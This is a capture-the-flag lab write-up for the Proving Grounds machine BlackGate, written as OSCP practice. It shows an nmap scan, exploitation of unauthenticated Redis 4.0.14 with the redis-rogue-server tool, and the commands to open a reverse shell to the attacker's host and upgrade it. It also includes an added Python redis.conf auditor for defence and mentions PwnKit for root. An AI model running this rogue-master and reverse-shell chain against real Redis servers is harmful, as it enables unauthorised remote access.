Proving grounds: BlackGate
--
Today we will take a look at Proving Grounds: BlackGate. I am sharing this post as part of my preparation for the OSCP exam, and to show you the way if you get stuck. Please try to understand each step and take notes.
- Network scan
└─# nmap -Pn -p- --min-rate 10000 192.168.100.176
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-16 13:03 EDT
Warning: 192.168.100.176 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.100.176
Host is up (0.099s latency).
Not shown: 55372 closed tcp ports (reset), 10161 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
6379/tcp open redis
└─# nmap -sCV -p6379 192.168.100.176
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-16 13:04 EDT
Nmap scan report for 192.168.100.176
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
6379/tcp open redis Redis key-value store 4.0.14
- redis (6379)
┌──(root㉿kali)-[~/ctf/redis-rogue-server]
└─# ./redis-rogue-server.py --rhost 192.168.100.176 --lhost 192.168.49.100
______ _ _ ______ _____
| ___ \ | (_) | ___ \ / ___|
| |_/ /___ __| |_ ___ | |_/ /___ __ _ _ _ ___ \ `--. ___ _ ____ _____ _ __
| // _ \/ _` | / __| | // _ \ / _` | | | |/ _ \ `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \ __/ (_| | \__ \ | |\ \ (_) | (_| | |_| | __/ /\__/ / __/ | \ V / __/ |
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_| \_/ \___|_|
__/ |
|___/
@copyright n0b0dy @ r3kapig
[info] TARGET 192.168.100.176:6379
[info] SERVER 192.168.49.100:21000
[info] Setting master…
[info] Setting dbfilename…
[info] Loading module…
[info] Temerory cleaning up…
What do u want, [i]nteractive shell or [r]everse shell: r
[info] Open reverse shell…
Reverse server address: 192.168.49.100
Reverse server port: 6379
[info] Reverse shell payload sent.
[info] Check at 192.168.49.100:6379
[info] Unload module…
Listen
nc -nvlp 6379
python3 -c 'import pty;pty.spawn("/bin/bash");'
export TERM=xterm
Ctrl + z
stty raw -echo ; fg
reset
prudence@blackgate:/home/prudence$ whoami
prudence
prudence@blackgate:/home/prudence$ pwd
/home/prudence
prudence@blackgate:/home/prudence$
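The scan above found Redis 4.0.14 reachable on 6379, and the tool ran its master, dbfilename and module stages with no password supplied. The redis.conf audit below is an added example, not part of the original write-up or the tool, that flags the settings which leave an instance in that state. The mapping of those stages to the SLAVEOF, CONFIG and MODULE commands, the finding names and both sample configs are assumptions made for illustration.

```python
import shlex

# Redis 4.x commands behind the "Setting master", "Setting dbfilename" and
# "Loading module" stages in the tool output (assumed mapping, not from the page).
STAGE_COMMANDS = ("SLAVEOF", "CONFIG", "MODULE")
LOOPBACK = {"127.0.0.1", "::1"}

def parse_conf(text):
    """Parse redis.conf text into {directive: [argument lists]}."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            name, *args = shlex.split(line)
            conf.setdefault(name.lower(), []).append(args)
    return conf

def audit(text):
    """Return a sorted list of finding IDs for one redis.conf."""
    conf = parse_conf(text)
    findings = set()
    binds = [addr for args in conf.get("bind", []) for addr in args]
    has_password = any(args and args[0] for args in conf.get("requirepass", []))
    protected = conf.get("protected-mode", [["yes"]])[-1][0].lower() == "yes"
    if not has_password:
        # Protected mode only applies when there is no explicit bind directive.
        remote_ok = any(a not in LOOPBACK for a in binds) or (not binds and not protected)
        if remote_ok:
            findings.add("unauthenticated-remote-access")
    # rename-command NAME "" disables a command; any other value hides it.
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    for command in STAGE_COMMANDS:
        if command not in renamed:
            findings.add(f"{command.lower()}-callable")
    return sorted(findings)

# Constructed sample configs, not taken from the target machine.
EXPOSED = "bind 0.0.0.0\nprotected-mode no\nport 6379\n"
HARDENED = """
bind 127.0.0.1
protected-mode yes
requirepass "constructed-example-password"
rename-command SLAVEOF ""
rename-command CONFIG ""
rename-command MODULE ""
"""

if __name__ == "__main__":
    for label, sample in (("exposed", EXPOSED), ("hardened", HARDENED)):
        print(label, audit(sample))
```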
The privesc on this machine is reverse engineering. That's why I couldn't solve it. But to get root you can use PwnKit.
If you have any questions or comments, please do not hesitate to write. Have a good day.